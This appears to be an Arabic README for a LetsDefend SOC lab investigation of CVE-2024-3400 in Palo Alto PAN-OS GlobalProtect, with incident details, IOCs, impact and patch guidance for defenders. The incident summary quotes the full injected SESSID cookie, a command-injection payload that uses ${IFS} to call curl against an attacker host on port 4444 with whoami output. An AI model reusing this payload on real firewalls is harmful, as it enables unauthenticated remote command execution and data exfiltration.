## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CYPRIANATSYOR-LETSDEFEND-CVE2024-3400-CASE-STUDY
# letsdefend-cve2024-3400-case-study
استراتيجيات الكشف والتحليل والاستجابة لمحاولات استغلال CVE-2024-3400 التي تستهدف بوابات GlobalProtect في Palo Alto PAN-OS. يتضمن مؤشرات الاختراق (IOCs) وأنماط الاستغلال وإرشادات التخفيف.
# التحقيق في حادثة CVE-2024-3400
# 🔍 نظرة عامة
يحتوي هذا المستودع على تحقيق مفصل وتحليل تهديدات لـ **CVE-2024-3400** ، وهي ثغرة حرجة في حقن الأوامر بدون مصادقة تؤثر على برنامج **Palo Alto Networks PAN-OS** ، وتستهدف تحديدًا بوابة GlobalProtect.
في 18 أبريل 2024، تم اكتشاف نشاط استغلال ضد جدار حماية PAN-OS داخلي عبر نقطة النهاية الضعيفة `/global-protect/login.esp`. استخدم المهاجم ملف تعريف ارتباط `SESSID` معدًا يحتوي على أمر `curl` يتم تنفيذه عبر علامة backtick للوصول إلى خادم C2 بعيد مستضاف على `144.172.79.92` (ميامي، فلوريدا). استغلت الحمولة الضارة `${IFS}` لتجاوز عوامل التصفية البسيطة واستخدمت دليل القياس عن بُعد (telemetry) في PAN-OS لترتيب النشاط الضار. استجاب جدار الحماية برمز `200 OK`، مما يشير إلى أن الحمولة نُفذت بنجاح على الأرجح.

## 📄 ملخص الحادثة
* **معرّف الحدث** : 249
* **قاعدة الكشف** : SOC274 – استغلال حقن الأوامر في PAN-OS
* **وقت الحدث** : 18 أبريل 2024، الساعة 03:09 صباحًا بالتوقيت العالمي المنسق (UTC)
* **اسم المضيف** : `PA-Firewall-01`
* **عنوان IP الوجهة** : `172.16.17.139`
* **عنوان IP المصدر** : `144.172.79.92`
* **طريقة الطلب** : `POST`
* **نقطة النهاية** : `/global-protect/login.esp`
* **حمولة ملف تعريف الارتباط** : `SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)`
* **التجزئات الضارة** :
* **SHA256** : `3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac`
* **MD5** : `0c1554888ce9ed0da1583dbdf7b31651`
* : (تم تنفيذه باستخدام )
## 🧠 استخبارات التهديدات

### الخطوة 1: الكشف الأولي عن الاستغلال بالبحث في Malpedia

### الخطوة 2: تحليل التجزئة والتحقيق فيها

### الخطوة 3: تحقيق إضافي

### الخطوة 4: التحقيق في عنوان IP

## 🧠 المؤشرات السلوكية
* إساءة استخدام `SESSID` لحقن الأوامر
* استخدام `${IFS}` للمراوغة
* ترتيب الحمولة في `/opt/panlogs/tmp/device_telemetry`
* تورط عملية `dt_send` بعد الاستغلال
* استدعاء شبكة عكسي إلى عنوان IP الخاص بالمهاجم على المنفذ `4444`
* * *
## 📄 أدلة السجلات

* * *
## 🧩 ارتباط التجزئات

* * *
## ✅ النقاط المكتسبة في LetsDefend

## 🚨 التأثير
* تنفيذ أوامر عن بُعد بدون مصادقة على جهاز أمني أساسي
* احتمال تنزيل وتنفيذ حمولة Python يتحكم بها المهاجم
* إساءة استخدام آليات القياس عن بُعد الداخلية في PAN-OS للترتيب أو استخراج البيانات
* السماح بحركة مرور من عنوان IP ضار معروف
## ✅ إجراءات الاستجابة الموصى بها
1. **تحديث PAN-OS** إلى الإصدارات: `10.2.9-h1` أو `11.0.4-h1` أو `11.1.2-h3`
2. **حظر عنوان IP الضار** : `144.172.79.92`
3. **البحث عن مؤشرات الاختراق (IOCs)** في السجلات وأنظمة الملفات
4. **فحص أدلة القياس عن بُعد** بحثًا عن ملفات مشبوهة أو سلوك تنفيذ
5. **عزل الأنظمة المتأثرة** وإجراء تحليل جنائي كامل
## 📁 المحتويات
* `logs/`: سجلات الكشف الأولية والمحللة
* `ioc/`: تجزئات الملفات وعناوين IP المرتبطة بالهجوم
* `analysis/`: تعمق في سلوك الاستغلال وتتبع العمليات
* `report/`: ملخص وصور للسجلات والأكواد من تحقيقاتي
* * *
## ما هو CVE-2024-3400
يشير CVE-2024-3400 إلى ثغرة حرجة في Palo Alto Networks PAN-OS، وتؤثر تحديدًا على بوابات GlobalProtect. إليك تفصيل لما هو معروف علنًا عنها:
## 🔥 CVE-2024-3400 – ثغرة حقن الأوامر في Palo Alto PAN-OS
درجة CVSS: 10.0 (حرجة)
تاريخ النشر: أبريل 2024
المنتجات المتأثرة: PAN-OS 10.2 و11.0 و11.1 عند تفعيل GlobalProtect.
الاستغلال: مؤكد في البرية (يوم صفري)
نوع الثغرة: حقن أوامر بدون مصادقة
## 🧠 ما هو الخطر؟
تسمح CVE-2024-3400 للمهاجمين غير المصادقين بتنفيذ أوامر عشوائية على نظام تشغيل جدار الحماية. وهذا يمنحهم فعليًا سيطرة كاملة على الأجهزة المتأثرة دون الحاجة إلى بيانات اعتماد — وهي نقطة اختراق خطيرة لأي مؤسسة تعتمد على جدران حماية Palo Alto.
## ⚠️ الشروط المطلوبة للاستغلال:
يجب تفعيل بوابة GlobalProtect.
إصدارات محددة من PAN-OS (10.2.x، 11.0.x، 11.1.x).
قابلة للاستغلال عبر الإنترنت إذا لم تكن خلف طبقات حماية إضافية.
## 🔎 ما يفعله المهاجمون:
إرسال طلبات مصممة لاستغلال ثغرة الحقن.
نشر قذائف بعيدة أو تنزيل حمولات من المرحلة الثانية.
السلوك المرصود يشمل:
تنفيذ أوامر عبر عناوين URL مصممة
آليات استمرارية
تنقل جانبي داخل الشبكات
## 🛡️ التخفيف والتوصيات:
التحديث فورًا: أصدرت Palo Alto إصلاحات؛ قم بالترقية إلى الإصدارات غير المتأثرة (مثل 10.2.9-h1 أو 11.0.4-h1 أو 11.1.2-h3 أو أحدث).
التحقق من مؤشرات الاختراق (IOCs) مثل العمليات المشبوهة أو الاتصالات الصادرة أو سجل أوامر CLI غير المعتاد.
استخدام أدوات مثل Shodan أو جرد الأصول للعثور على الأجهزة المعرضة للخطر.
## 🛠️ كيفية التحقيق (مثل عبر LetsDefend أو SIEM):
البحث عن عناوين IP خارجية تصل إلى GlobalProtect دون مصادقة صالحة.
التحقق من تنفيذ أوامر مشبوهة في السجلات (show system processes، cat /etc/passwd، وغيرها).
مراقبة سلوك جدار الحماية والتنبيه على الاتصالات الصادرة الشاذة.
> يعمل هذا المستودع كتقرير تحقيق داخلي وكمورد تعليمي للمدافعين الراغبين في فهم الاستغلال الواقعي لثغرات PAN-OS. المساهمات والملاحظات الإضافية مرحب بها.